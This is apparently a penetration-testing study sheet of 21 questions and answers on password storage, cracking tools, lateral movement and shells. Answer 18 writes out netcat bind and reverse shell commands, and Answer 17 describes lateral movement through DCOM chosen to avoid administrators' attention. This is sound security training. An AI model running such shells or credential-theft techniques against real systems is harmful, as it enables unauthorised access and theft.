Lesson 16 - Leveraging the Attack

Question 1

What is the term for a file containing data captures from system memory

Answer 1

Dump File

Question 2

What is the random generated string that can be added to the password before hashing

Answer 2

Salt

Question 3

What is the Brute Force attack in which multiple user accounts are tests with a dictionary common passwords

Answer 3

Password Spraying

Question 4

Where were LInux passwords originally stored and where are the currently and why

Answer 4

/etc/passwd

/etc/shadow - uses a hashing algorithm based on distribution

Most recently SHA-256 or SHA-512

Question 5

Where does Windows stored local usernames and passwords

Answer 5

Security Account Manager (SAM)

Passwords are stored in two types -

LanMan (LM) Hash.
NT Hash - simple MD4

Question 6

What is LSASS in Windows

Answer 6

Windows Local Security Authority - LSA Secrets stores password details

Question 7

What is the password cracking tools that gathers credentials by extracting key elements from memory

Answer 7

Mimikatz

Question 8

Modern password and hash cracking tool that can speed up the process by using different attack methods (dictionary, brute, mask)

Answer 8

Hashcat

Question 9

Parallel brute-forcer for network logins, Focus to support numerous network services that allow remote authentication

Answer 9

Medusa

Question 10

Tool that allows to interpret results from Nmap scan to automatically start Medusa agains open port

Answer 10

Brutespray

Question 11

Similar to Medusa but support parallel testing of several networks authentication. Bundled with pw-inspect

Answer 11

Hydra

Question 12

Highly optimized password cracker and can identify a large set of hashes with its community edition - mult platforms

Answer 12

John the Ripper

Question 13

URL Brute Forcer that comes bundled with different word lists geared towards web applications and site directories

Answer 13

DirBuster

Question 14

Does Burpsuite has a password cracker

Answer 14

Yes. -has a module for that

Question 15

What tools can I use for post-exploitation in a network that uses Windows AD

Answer 15

Responder.py
BloodhoundAD

Question 16

Name some methods of LoTL to perform lateral movements

Answer 16

PsExec, WMI, Login using Telnet or SSH

Note - these can stand out to administrator

Question 17

What are other methods for lateral movement that will not bring as much attention to the tester or hacker

Answer 17

Using RPC for inter-process communication between local and remote process on Windows. then utilized Distributed Component Object Model (DCOM) to enable communications of software components

DCOM apps use RPC as a transport mechanism for client requests

MMC2.0Application includes an ExecuteShellCommand()

Question 18

What are the two types of shell attacks

Answer 18

Bind Shell - target system binds it shell to a local port and an attacker’s shell communicates

NetCat is the most common tool
nc -lp 12345 -e /bin/sh

Reverse Shell - a malicious remote command shell where the victim host opens the connection to attacking hosts

nc -lp 12345 from host
Target
nc 192…. 12345 -e /bin/sh

Reverse shells are more effective since they are outbound and not as impacted from a firewall rule

Question 19

What is the type of password attack that creates variants and combinations of word lists in an attempt to crack a password

Answer 19

Rule Attack

Question 20

What is the parameter of NC which allows multiple subsequent connections to Windows bind shell

Answer 20

-L

Question 21

What common meterpreter command is not present in the PHP Variant

Answer 21

getsystem